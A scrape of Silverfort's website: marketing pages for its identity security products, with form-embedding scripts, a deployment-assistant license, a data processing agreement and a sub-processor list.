Innovate with speed and confidence. Securely adopt AI by governing, monitoring, and protecting your AI agents with the same rigor applied to human users. Protect AI from itself, from bad actors, and from insider threats. Learn more Add On Cloud Non-Human Identity Security Find, monitor, and secure every cloud-based NHI. View all your cloud NHIs, prioritize critical exposures, and remediate security and lifecycle gaps. Turn insight into action to strengthen your identity posture and reduce risk. Learn more Get a personalized quote Complete this form and a member of our team will be in touch to discuss --- - Published: 2025-07-23 - Modified: 2025-08-13 - URL: https://www.silverfort.com/cloud-ispm-signup/ Start building stronger cloud identity security posture from day one. Gain control over cloud identity risks with Silverfort's Cloud ISPM. Continuously identify and remediate cloud exposures such as misconfigurations, excessive privileges, and other identity weaknesses across your cloud environment. You’ll be able to assess and strengthen your identity posture across Cloud IdPs (Entra ID, AWS IAM, Google Workspace), SaaS applications, and cloud infrastructure (Azure, AWS, GCP) — all from a single view. Focus on what matters most by prioritizing fixes based on real risk, streamlining compliance efforts, and reducing identity complexity without sacrificing visibility. Get access window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "b9e43043-a389-4ee7-91bc-f3dcccafcaad", target: "#hbspt-form-b9e43043-a389-4ee7-91bc-f3dcccafcaad", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-b9e43043-a389-4ee7-91bc-f3dcccafcaad"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } Only Silverfort lets you manage identity threat exposures in one place — across all your cloud IdPs, infrastructure, and SaaS applications Gain deep visibility into identity exposures including misconfigurations, excessive privileges, risky practices, and other weaknesses that expand your attack surface. Know your identity threat exposure Get a consolidated view of all the weaknesses that expose your environment to credential access and privilege escalation. Prioritize the risks that matter most Focus on the most critical cloud-based identity threats and optimize your exposure management efforts. Remediate effectively to reduce risks Fix weaknesses and exposures you discover with actionable guidance or enforce MFA and authentication firewall policies. Learn more about our platform --- - Published: 2025-07-23 - Modified: 2025-08-13 - URL: https://www.silverfort.com/ispm-signup/ Unify and strengthen identity security posture across every environment Get a unified view of all identity security exposures across your hybrid environments to clearly understand your priorities based on real risk, and take immediate action. With this visibility and control, you can reduce your identity threat surface across both cloud and on-prem enviroments — all from a single platform built to accelerate your identity security posture management. Get access window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "4dd5f70a-9160-4a7e-8b4d-34932454bd3b", target: "#hbspt-form-4dd5f70a-9160-4a7e-8b4d-34932454bd3b", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-4dd5f70a-9160-4a7e-8b4d-34932454bd3b"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } Uncover the gaps and misconfigurations putting your organization at risk Gain comprehensive visibility into the security gaps, misconfigurations, malpractices, and legacy infrastructure that expose your environment to identity threats. IAM hardening Resolve any detected issues in your AD, cloud IdP, or federation infrastructure by continuously monitoring their resilience to the widest range of identity threats. Threat exposure management Discover all identity threat exposures that allow adversaries to perform credential access, privilege escalation, and lateral movement. Unified on-prem & cloud analysis Gain end-to end visibility into all identity security exposures across your on-prem and cloud environments. Learn more about our platform --- - Published: 2025-07-23 - Modified: 2025-08-13 - URL: https://www.silverfort.com/cloud-itdr-signup/ Detect and respond to identity threats across your cloud stack Detect and investigate identity-based threats across your entire multi-cloud environment from cloud IdPs to SaaS apps and infrastructure. Track malicious activity tied to a single identity and understand its full blast radius, even as it moves across systems. Uncover high-risk user behaviors like lateral movement, privilege misuse, and NHI abuse. Take fast and effective action with guided remediation and policy enforcement, while giving SecOps the visibility and context they need to contain threats and reduce risk. Get access window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "d0706ab3-0f32-4e30-9d2c-d480c22083a0", target: "#hbspt-form-d0706ab3-0f32-4e30-9d2c-d480c22083a0", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-d0706ab3-0f32-4e30-9d2c-d480c22083a0"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } Identity threat detection and response built for the cloud Know which identities are at risk, how they’re being exploited, and how to contain them — all from a single platform. Complete cloud coverage Detect identity-based threats across your entire cloud stack — including multi-cloud environments, SaaS apps, and cloud infrastructure. High precision Employ multiple risk engines that combine real-time analysis of the authentication with the user’s overall context and security posture to increase accuracy and avoid false positives. Active real-time response Block malicious access attempts to secure your cloud environment from malicious activity, while providing your team with actionable forensic data. Learn more about our platform --- - Published: 2025-07-23 - Modified: 2025-08-13 - URL: https://www.silverfort.com/itdr-signup/ Detect and stop identity risks across your entire attack surface Identify and respond to identity-based threats across both cloud and on-prem environments including directories, infrastructure, SaaS apps, and identity providers. Quickly detect malicious activity correlated to any identity as it moves across environments, and understand the full scope of exposure. With real-time insight into identity data and authentication activity, you can stop threats like lateral movement, privilege escalation, and NHI misuse before attackers reach critical resources. This helps to respond quickly with policy-based enforcement such as MFA and access blocking and give SecOps the context they need to contain threats with speed and precision. Get access window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "9746d1a7-a515-42a0-a04d-de06fb690346", target: "#hbspt-form-9746d1a7-a515-42a0-a04d-de06fb690346", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-9746d1a7-a515-42a0-a04d-de06fb690346"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } Identity threat detection and response that closes the gaps others miss See identity threats in real time, understand how they spread, and stop them before any damage is done — all from a single platform. Widest range of identity threats coverage Detect all types of identity threats across the full range of attempted malicious access, from brute force and Kerberoasting to Pass the Ticket and DCsync. Real-time prevention Trigger MFA upon detected malicious access attempts over any remote command-line or screen sharing tool, preventing adversaries from using them for malicious access. Streamline investigation Empower your SecOps team to easily trace the access trail of compromised user accounts to patient zero by filtering any account that violated the MFA or block access policy. Learn more about our platform --- - Published: 2025-07-23 - Modified: 2025-08-13 - URL: https://www.silverfort.com/itdr-ispm-signup/ One identity security platform to manage all identity risks and stop identity threats Reduce your identity attack surface and detect threats before they lead to compromise—all from one platform. By continuously uncovering misconfigurations, excessive access, and legacy risks across cloud and on-prem systems, you can prioritize what to fix based on real risks. Detect threats in real time, whether it’s lateral movement, privilege escalation, or NHI abuse, and take action fast. Enforce MFA, block access, or guide remediation all on one platform, and empower your SecOps and IAM teams with shared visibility to reduce exposure and accelerate response. Get access window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "5daaaffb-ff07-4e2d-847b-f9e95e200dd1", target: "#hbspt-form-5daaaffb-ff07-4e2d-847b-f9e95e200dd1", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-5daaaffb-ff07-4e2d-847b-f9e95e200dd1"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } Complete identity posture and threat detection across every identity and system Reduce your identity attack surface and respond to active threats all from the same platform with the same identity insights. Streamline protection and response Bridge posture insights and threat signals to take faster, smarter action rom policy enforcement to guided remediation Detect & respond to attacks in real time Stop lateral movement, privilege escalation, and service account misuse the moment it starts with detection that follows identities across cloud and on-prem. Close gaps before attackers exploit them Continuously uncover and fix identity exposures — like misconfigurations, excessive privileges, and legacy risks — before they turn into active threats. Learn more about our platform --- - Published: 2025-07-23 - Modified: 2025-08-13 - URL: https://www.silverfort.com/service-accounts-signup/ Don’t let service accounts be your blind spot—protect them Get full visibility into every non-human identity, including their sources, destinations, authentication protocols, and activity levels. Continuously monitor behavior, detect risky deviations in real time, and trigger instant responses—whether alerting or blocking—to stop threats before they spread. Get access window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "96f01111-fb8a-41c9-9501-1ddc871329ff", target: "#hbspt-form-96f01111-fb8a-41c9-9501-1ddc871329ff", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-96f01111-fb8a-41c9-9501-1ddc871329ff"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } Automatically discover, control and protect all service accounts in your environment. Discover, monitor and protect service accounts with fully automated visibility, risk analysis and adaptive access policies, without requiring password rotation. Analyze all service account activity Assess authentication risks using contextual data and risk scoring, detect anomalies, and equip SOC teams with actionable insights and logs. Proactive threat prevention Place a virtual perimeter around your service accounts with access policies tailored to each account’s behavior to prevent threat actors from using them in lateral movement attacks. Automated discovery & monitoring Gain automatic and comprehensive visibility into all your service accounts and non-human identities, including the ones you’re not aware of, as well as real-time insights into their activity and risk level. Learn more about our platform --- - Published: 2025-07-16 - Modified: 2025-08-21 - URL: https://www.silverfort.com/sdaterms/ The use of the Silverfort Deployment Assistant (hereinafter “SDA”) is governed by the following terms and conditions: Silverfort hereby grants the end-user (“Licensee”) Licensee a non-exclusive, non-sublicensable, non-transferable, revocable license to use the SDA solely in object code format, forinternal business security purposes only. Licensee shall not, directly or indirectly: (i) sell, lease, sublicense or distribute the SDA, or allow any third party to use the SDA, or any part thereof, in any manner; (ii) install or access the SDA, or any part thereof, on a server not owned by, under the control of and/or possession of Licensee or its Affiliates; (iii) reverse engineer, decompile, disassemble or otherwise reduce to human-perceivable form the SDA’s source code, or any part thereof; (iv) copy, modify, revise, enhance or alter the SDA, or any part thereof; (v) make the SDA, or any part thereof, accessible to other Licensees or the public; (vi) circumvent, disable or otherwise interfere with security-related features of the SDA, or any part thereof, or features that prevent or restrict use or copying of any content or that enforce limitations on use of the SDA, or any part thereof; (vii) interfere or attempt to interfere with the integrity or proper working of the SDA, or any part thereof; (viii) remove, alter or obscure any proprietary notice displayed on or via the SDA, or any part thereof; (ix) use the SDA, or any part thereof, to violate any applicable laws; (x) represent that it possesses any proprietary interest in the SDA, or any part thereof; (xi) publish or disclose to any third party any: reviews, testing results, information, or the results of any benchmark test of the SDA, or any part thereof, without Silverfort’s express prior written consent. The SDA is not for sale and is and shall remain Silverfort's exclusive property. All right, title and interest in and to the SDA, including any intellectual property rights therein and any and all improvements and derivative works thereof are and shall remain, as between the Parties, owned exclusively by Silverfort. Nothing herein constitutes a waiver of Silverfort's intellectual property rights under any applicable laws. Any data which is derived from the use of the SDA, is owned by Silverfort and may be used, among other things, for maintaining, providing, updating, fixing and improving the SDA and any related services, for research and development purposes, and/or for statistical purposes. If Silverfort receives any feedback regarding the SDA (“Feedback”), all Feedback, including all intellectual property rights therein, shall be provided on an “AS-IS” basis and without any warranty of any kind, shall be owned exclusively by Silverfort and shall be considered Silverfort's Confidential Information. Licensee hereby irrevocably and perpetually assigns to Silverfort all Feedback and all intellectual property rights therein and hereby waives any and all moral rights that Licensee may have in such Feedback. Licensee and Silverfort shall not use any confidential, proprietary or other non-public information, including technical, marketing, financial, employee and planning (hereinafter “Confidential Information”) of the other party for any purpose not expressly permitted hereunder, and shall disclose the Confidential Information only to such employees or contractors of who have a need to know such Confidential Information, and who are under a duty of confidentiality no less restrictive than the Receiving Party’s duty hereunder. For clarity, Silverfort may use Licensee’s Confidential Information in order to comply with obligations under the Agreement as well as administering and operating the SDA. The receiving party shall protect the Confidential Information from unauthorized use, access or disclosure in the same or a similar manner as the such party protects its own confidential or proprietary information of a similar nature, and in any event with no less than reasonable care. Licensee represents and warrants that it owns, or has obtained the necessary rights, permissions and/or waivers, to install, use and/or access the SDA on the server on which the SDA is or will be installed, used, or accessed and in order to monitor and inspect the server. The SDA is provided on an “AS IS” and “As Available” basis without representations or warranties of any kind or nature, whether express, implied, statutory or otherwise. To the maximum extent permitted by applicable law, Silverfort specifically disclaims all implied warranties of merchantability, fitness for a particular purpose, title, non-infringement of third-party rights or arising from a course of dealing, usage or trade practice. To the extent any Licensee Data is made available to Silverfort, Licensee hereby grants Silverfort a non-exclusive, irrevocable, non-sublicensable, royalty-free, fully paid-up right and license to use such Licensee Data, in order to perform Silverfort’s obligations hereunder. In the event a data processing agreement is required under GDPR, the terms of the standard Data Processing Agreement available, at https://www. silverfort. com/data-processing-agreement-june-2025/ (“DPA”) shall apply. The SDA and the output therefrom is intended for informational purposes only, and Licensee may not rely on the information from the SDA in determining whether to enter any further transaction to license Silverfort’s software or services. The recommendations and information from Silverfort and the SDA shall not be considered any warranty nor recommendation as to the proper future use, installation, nor functioning of Silverfort’s software or services. EXCEPT FOR ANY DAMAGES RESULTING FROM ANY BREACH OF EITHER PARTY’S CONFIDENTIALITY OBLIGATIONS HEREIN, AND/OR DAMAGES RESULTING FROM VIOLATION OF SILVERFORT’S INTELLECTUAL PROPERTY RIGHTS, TO THE EXTENT PERMITTED BY LAW, EITHER PARTY’S TOTAL AGGREGATE LIABILITY FOR ANY AND ALL DAMAGES AND LOSSES THAT ARISE UNDER OR IN CONNECTION WITH THIS AGREEMENT AND ANY ORDER FORM, OR THAT RESULT FROM USE OF OR INABILITY TO USE THE SDA, SHALL NOT IN ANY CIRCUMSTANCE EXCEED $1000. THIS LIMITATION OF LIABILITY IS CUMULATIVE AND NOT PER INCIDENT. --- - Published: 2025-07-15 - Modified: 2025-08-21 - URL: https://www.silverfort.com/data-processing-agreement-june-2025/ Last Updated – June 2025 This Data Processing Agreement (“DPA”) forms an integral part of the Silverfort Software License Agreement (“Agreement”) by and between the Client (“Client”) and Silverfort entity noted in the Agreement(“Silverfort”). Both parties shall be referred to as the “Parties” and each, a “Party”. WHEREAS, Silverfort shall provide the Client with the Services as described in the Agreement. In the course of providing the Services pursuant to the Agreement, Silverfort may process Personal Data on Client's behalf;and WHEREAS, The Parties wish to set forth the arrangements concerning the processing of Personal Data (defined below) within the context of the Services and agree to comply with the following provisions with respect to any Personal Data, each acting reasonably and in good faith. NOW THEREFORE, in consideration of the mutual promises set forth herein and other good and valuable consideration, the receipt and sufficiency of which are hereby acknowledged by the Parties, the parties, intending to be legally bound, agree as follows: 1. INTERPRETATION AND DEFINITIONS 1. The headings contained in this DPA are for convenience only and shall not be interpreted to limit or otherwise affect the provisions of this DPA. 1. 1 References to clauses or sections are references to the clauses or sections of this DPA unless otherwise stated. 1. 2 Words used in the singular include the plural and vice versa, as the context may require.  1. 3 Capitalized terms not defined herein shall have the meanings assigned to such terms in the Agreement. 1. 4 Definitions:(a) “Adequate Country” is a country that received an adequacy decision from the European Commission or other applicable data protection authority. The terms “Business”, “Business Purpose”, “Consumer”, “Controller”, “Data Subject”, “Personal Data”, “Personal Data Breach”, “Processing” (and “Process”), “Processor”, “Holder”, “Sensitive Data”, “Service Provider”, “Sale” (or “Sell”) and “Share”, “Special Categories of Personal Data”, “Sub-processor” and “Supervisory Authority”, shall all have the same meanings as ascribed to them under applicable Data Protection Laws. Further, under this DPA “Data Subject” shall also mean and refer to a “Consumer”; “Personal Data” shall also mean and refer to “Personal Information”; “Special Categories of Data” or “Highly Sensitive Data” shall also mean and refer to “Sensitive Data”; and "Data Processor" shall mean and refer to the Data Processor, the Service Provider or Third Party as applicable and the "Data Controller" shall mean and refer to the Business as well. (b) “Authorized Affiliate” means any of Client's Affiliate(s) which (a) is subject to the Data Protection Laws and Regulations and (b) is permitted to use the Services pursuant to the Agreement between Client and Silverfort, but has not signed its own agreement with Silverfort and is not a "Client" as defined under the Agreement. (c) “Client Data” means any Personal Data processed by Silverfort in the course of providing the Services. (d) “Data Privacy Framework” or “DPF” means the EU-U. S. Data Privacy Framework, Swiss-U. S. Data Privacy Framework and the UK Extension to the EU-U. S. Data Privacy Framework operated by the U. S. Department of Commerce; as may be amended, superseded or replaced. (e) “Data Privacy Framework Principles” means the Principles and Supplemental Principles contained in the relevant Data Privacy Framework available at: https://www. dataprivacyframework. gov/program-articles/Participation-Requirements-Data-Privacy-Framework-(DPF)-Principles; as may be amended, superseded or replaced.   (f) “Data Protection Laws and Regulations” means any and all applicable privacy and data protection laws and regulations including, where applicable, European Data Protection Laws, Israeli Data Protection Laws and the US Data Protection Laws, as may be amended or superseded from time to time. (g) “European Data Protection Laws” means collectively, the laws and regulations of the European Union, the EEA, their Member States, and the United Kingdom, applicable to the Processing of Personal Data, including (where applicable): (i) EU General Data Protection Regulation (Regulation 2016/679) (“EU GDPR”); Regulation 2018/1725; and the e-Privacy Directive (Directive 2002/58/EC), as amended (e-Privacy Law); (ii) UKData Protection Act 2018 (DPA 2018), as amended, and EU GDPR as incorporated into UK law as amended (“UK GDPR” and collectively with the EU GDPR shall be referred to herein as the “GDPR”); (iii) Swiss Federal Data Protection Act (dated June 19, 1992, as of March 1, 2019) and the Ordinance on the Federal Act on Data Protection; (iv) any national data protection laws made under, pursuant to, replacing or succeeding the EU GDPR or the e-Privacy Law; (v) any amendment or legislation replacing or updating any of the foregoing; and (vi) any judicial or administrative interpretation of any of the above, including any binding judicial or administrative interpretation of any of the above, or approved certification mechanisms issued by any relevant Supervisory Authority. (h) “Instructions” means the written, documented instructions issued by the Client to Silverfort directing Silverfort to perform a specific or general action with regard to Client Data (including, but not limited to, instructions to provide the Services under the Agreement and instructions under this DPA). (i) “Israeli Data Protection Laws” means, collectedly, the: (i) Israeli Privacy Protection Law, 5741-1981, (as amended under Amendment 13); (ii) the regulations promulgated pursuant thereto, including the Israeli Privacy Protection Regulations (Data Security), 5777-2017 and the Israeli Protection of Privacy (Transfer of Data to Databases Abroad) Regulations, 5761-2001; (iii) any amendments or legislation replacing or updating any of the foregoing, and; (iv) any judicial or administrative interpretation of any of the above, including any binding guidance, guidelines, codes of practice, approved codes of conduct or certification mechanisms approved by the Israeli Privacy Protection Authority.   (j) “Member State” or “EEA”means the European Economic Area. “Union” means the European Union. (k) “Security Documentation” means the Security Documentation applicable to the specific Services purchased by Client, as updated from time to time, and will be made available to Client upon a request sent by Client to Silverfort at privacy@silverfort. com. (l) “Security Incident” means any accidental or unlawful destruction, loss, alteration, unauthorized disclosure of, or access to Client Data. Any Personal Data Breach will comprise a Security Incident. (m) “Silverfort” means the relevant Silverfort entity of the following Silverfort legal entities: Silverfort Inc. , Silverfort Ltd. , and any other wholly owned subsidiary of Silverfort, Inc. or Silverfort Ltd; and or its Affiliates. (n) “Standard Contractual Clauses” or “SCCs” means (i) the standard contractual clauses for the transfer of Personal Data to third countries pursuant to Regulation (EU) 2016/679 of the European Parliament and of the Council adopted by the European Commission Decision 2021/914 of 4 June 2021, (ii) the UK “International Data Transfer Addendum to the European Commission Standard Contractual Clauses” \(“UK SCC”); or (iii) the applicable standard data protection clauses issued, approved or recognized by the Swiss Federal Data Protection and Information Commissioner (“Swiss SCC”), all incorporated herein by reference. (o) “Supervisory Authority” means an independent public authority which is established by an EU Member State pursuant to the GDPR. (p) "US Data Protection Laws” means any U. S. federal and state privacy laws and regulations effective as of the Effective Date of this DPA and applies to Silverfort Processing of Client Data, and any implementing regulations and amendment thereto, including without limitation, the California Consumer Privacy Act (Cal. Civ. Code §§ 1798. 100 – 1798. 199) of 2018 including as modified by the California Privacy Rights Act as well as all regulations promulgated thereunder from time to time (“CCPA”), the Colorado Privacy Act C. R. S. A. § 6-1-1301 et seq (SB 21-190) (“CPA”); the Connecticut Data Privacy Act, S. B. 6 (Connecticut 2022) (“CTDPA”); the Delaware Personal Data Privacy Act (“DPDPA”); the Iowa Data Privacy Law; the Florida Digital Bill of Rights S. B 262 (“FDBR”); the Minnesota Consumer Data Privacy Act; the Montana Consumer Data Privacy Act 68th Legislature 2023, S. B. 0384 (“MTCDPA”); the Maryland Online Data Privacy Act; the Nebraska Data Privacy Act; the New Hampshire Privacy Act; the New Jersey Data Privacy Law; the Oregon Consumer Data Privacy Act ORS 646A. 570-646A. 589 (“OCDPA”); the Texas Data Privacy and Security Act, Tex. Bus. & Com. Code Ann. § 541. 001 et seq (“TDPSA”); the Tennessee Information Protection Act (“TIPA”); the Utah Consumer Privacy Act, Utah Code Ann. § 13-61-101 et seq (“UCPA”); the Washington “My Health My Data” Act, Wash. Rev. Code § 19. 373. 005 et seq. , and Nev. Rev. Stat. § 603A, as amended by Nevada S. B. 370 (together, the “Washington and Nevada Consumer Health Data Laws”); the Virginia Consumer Data Protection Act, Va. Code Ann. § 59. 1-575 et seq. (SB 1392) (“VCDPA”). All as amended or superseded from time to time and including any implementing regulations and amendments thereto. Any other terms that are not defined herein shall have the meaning provided under the Agreement or applicable Data Protection Laws and Regulations. A reference to any term or section of the Data Protection Laws and Regulations means the version as amended. Any references to the GDPR in this DPA shall mean the GDPR or UK GDPR depending on the applicable Law. 2. PROCESSING OF PERSONAL DATA 2. 1 Roles of the Parties. The Parties acknowledge and agree that with regard to the Processing of Personal Data under this DPA, Silverfort is the Data Processor and the Client is the Data Controller. For clarity, this DPA shall not apply with respect to Silverfort processing activity as a Data Controller. 2. 2 Client’s Processing of Personal Data. Client shall, in its use of the Services, Process Personal Data in accordance with the requirements of Data Protection Laws and Regulations, comply at all times with the obligations applicable to data controllers and comply with any and all transparency-related obligations (including, without limitation, displaying any and all relevant and required privacy notices or policies) and shall at all times have any and all required ongoing legal bases in order to collect, Process and transfer to Silverfort the Personal Data and to authorize the Processing by Silverfort of the Personal Data which is authorized in this DPA. The Client shall be exclusively responsible to ensure its Instructions are compliant with applicable Data Protection Laws and enable a lawful Processing of Client Data. Client shall defend, hold harmless and indemnify Silverfort (including without limitation their directors, officers, agents, subcontractors and/or employees) from and against any liability of any kind related to any breach, violation or infringement by Client and/or its authorized users of any Data Protection Laws and Regulations and/or this DPA and/or this Section. 2. 3 Silverfort’s Processing of Personal Data. 2. 3. 1 Subject to the Agreement, Silverfort shall Process Client Data only in accordance with Client’s instructions as necessary for the performance of the Services unless required to otherwise by Union or Member State law or any other applicable law to which Silverfort and its Affiliates are subject; in which case, Silverfort shall inform the Client of the legal requirement before Processing, unless that law prohibits such information on important grounds of public interest. The duration of the Processing, the nature and purposes of the Processing, as well as the types of Personal Data Processed and categories of Data Subjects under this DPA are further specified in Schedule 1 (Details of the Processing) to this DPA. 2. 3. 2 To the extent that Silverfort cannot comply with a request from Client relating to Processing of Client Data or where Silverfort considers such a request to be unlawful, Silverfort (i) shall inform Client, providing relevant details of the problem (but not legal advice), (ii) Silverfort may, without any kind of liability towards Client, temporarily cease all Processing of the affected Personal Data (other than securely storing those data), and (iii) if the Parties do not agree on a resolution to the issue in question and the costs thereof, each Party may, as its sole remedy, terminate the Agreement and this DPA with respect to the affected Processing, and Client shall pay to Silverfort all the amounts owed to Silverfort or due before the date of termination. Client will have no further claims against Silverfort (including, without limitation, requesting refunds for Services) due to the termination of the Agreement and/or the DPA in the situation described in this paragraph... --- - Published: 2025-07-10 - Modified: 2025-08-21 - URL: https://www.silverfort.com/silverfort-sub-processors-list/ July 2025 To support delivery of our services, Silverfort, Inc. , Silverfort Ltd. , Silverfort GmbH. , and Silverfort Pte. Ltd. (“Silverfort”, “We”, “Our”) engage and use data processors with access to certain customer data (each, a "Subprocessor"). This page provides important information about the identity, location and role of each Subprocessor. Entity nameSub-processing activitiesHosting countryMicrosoft Corporation(Azure)Cloud Infrastructure Silverfort Unified IdentityProtection SaaS:Clients from the USA:Admin Console- East-USAuth-Service- East-US, West-USClients from the European Union& UK:Admin Console- Germany-WestAuth-Service- Germany-West; France-CentralSilverfort Messaging Services andMFA Forwarding (SaaS):Clients from the US, UK, & Global:East-US, West Europe(Netherlands), UK-SouthClients from the European Union:Germany- West, France-CentralClients from Asia and Australia:Southeast-Asia (Singapore),Australia-EastAWSCloud Infrastructure Silverfort cloud identity platform:Frankfurt (Germany)Clients with FIDO2 authentication:Clients from the USA, UK &Global:IrelandClients from the European Union:GermanyClients from Asia and Australia:SingaporeAppcuesProduct GuidanceUSCoralogixLog Management IrelandGoogle's Firebase (FCM)Sending MFA to Mobile App(only relevant in the casethat Silverfort Mobile app isused)USSnowflake, Inc. Data Warehouse ServicesIrelandBeamerProduct Announcement USHeapProduct Analytics US --- - Published: 2025-07-01 - Modified: 2025-08-01 - URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/beazley-security/ Silverfort's Cyber Insurance Ecosystem Beazley Security Beazley Security empowers clients with unparalleled cyber resilience, combining decades of technical expertise with the data-led approach of our parent company, global insurance provider Beazley Insurance. Our global team is committed to helping clients develop true cyber resilience; we excel in protection, detection, response, and recovery, ensuring you can withstand and recover from any cyberattack. How Silverfort and Beazley Security work together Beazley Security provides a range of managed security and risk management services, including Advisory consulting offerings and specialized services to secure Microsoft and cloud environments. By working closely with Silverfort, our teams deliver enhanced protections against identity-based attacks, focusing on AD hardening and leveraging Risk-based and Multi-factor authentication to improve secure access controls to reduce the risk of breach or loss. Beazley Security has operations in the US, Canada, UK, Germany, France, Spain, and Singapore. Exclusively for Beazley clients Get a free identity security assessment with Silverfort Silverfort’s free identity security assessment can help Beazley Security clients discover and resolve gaps in their MFA and privileged access protection and help to discover and secure service accounts. Get started Learn more about cyber insurance compliance with Silverfort --- - Published: 2025-06-27 - Modified: 2025-07-30 - URL: https://www.silverfort.com/partners/partner-directory/ Partner directory Our partner network includes leading value-added distributors and resellers, advisory consultants, global system integrators, technology partners and more. Browse our partner directory here. --- - Published: 2025-06-19 - Modified: 2025-08-21 - URL: https://www.silverfort.com/mtny2/ The identity security platform you deserve Never compromise. Identity security without limits. The identity infrastructure is siloed, but identity security doesn’t have to be. Discover and protect every dimension of identity, everywhere. Human, AI, or machine, cloud or on-prem. Get a demo or Take a platform tour Trusted by 1,000+ organizations around the world. Rated 4. 8 on Gartner Peer Insights Where's the gap in your identity defense? Privileged Access Security Non-Human Identity Security Active Directory Service Account Security Extending Multi-Factor Authentication Authentication Firewall Identity Threat Detection and Response AI Agent Security The # 1 attack Surface Identity is where your current security tools end and every attack begins. IAM security controls only work within their own silos, leaving critical gaps. Too many systems and resources are left exposed and unprotected, creating countless security blind spots. Why Silverfort The Silverfort identity security platform Secure your entire IAM infrastructure from within. We found a way to bring identity security to every corner of your environment. Our Runtime Access Protection (RAP) technology integrates seamlessly with your IAM infrastructure to protect all identities, all environments, and all resources—all the time. End-to-end Identity protection for on-prem, cloud, humans and machines. Protect the unprotectable Including systems that no other solution can cover. Zero changes To your systems, minimizing disruptions and cost. Discover the platform Proven technology Trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to achieve it together. "Silverfort is able to protect what no one else can. There were no solutions that we looked at that were as comprehensive. Of the security tools that we use, Silverfort has a very high return on investment. " Tom ParkerVP of IT & CISO | Kayak "We did a demo and POC—and our jaws dropped. We were left wondering where this has been all our lives. We knew we absolutely needed this to fit our identity security needs. " Janusz Wreba-JaworskiCyber Security Manager | Womble Bond Dickinson "Many large enterprises find it difficult to implement secure employee authentication across all their environments. Silverfort’s innovative solution simplifies this process without system modifications, saving time and money. " William WooGroup CIO | Singtel “With the help of Silverfort, we were able to fill a critical gap in our identity security, which was key for our overall security posture. ” Katie McMillanInformation Security Manager | Agilisys Proven technology Trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to take identity security further. The results speak for themselves. Hear from our customers Latest blogs Explore our blog The identity security platform you deserve Never compromise. Identity security without limits. The identity infrastructure is siloed, but identity security doesn’t have to be. Discover and protect every dimension of identity, everywhere. Human, AI, or machine, cloud or on-prem. Get a demo or Take a platform tour --- - Published: 2025-06-18 - Modified: 2025-08-21 - URL: https://www.silverfort.com/platform/ai-agent-security/ AI Agent Security Secure your AI agents. Innovate with speed and confidence. Securely adopt AI by governing, monitoring, and protecting your AI agents with the same rigor applied to human users. Protect AI from itself, from bad actors, and from insider threats. Get a demo Unlock AI agent potential, securely. Silverfort’s AI Agent Security extends identity-first protection to AI agents. Our inline architecture sits between AI agents and target systems via the MCP server, inspecting every request in real time for complete visibility and control. Human accountability for every AI agent Link all AI agent actions to the human they represent for accountability and auditability. Inline, real-time security controls Restrict over-privilege by dynamically granting access between AI agents and MCP servers. Protection against misuse and data leakage Stop AI agent overreach and make lateral movement and 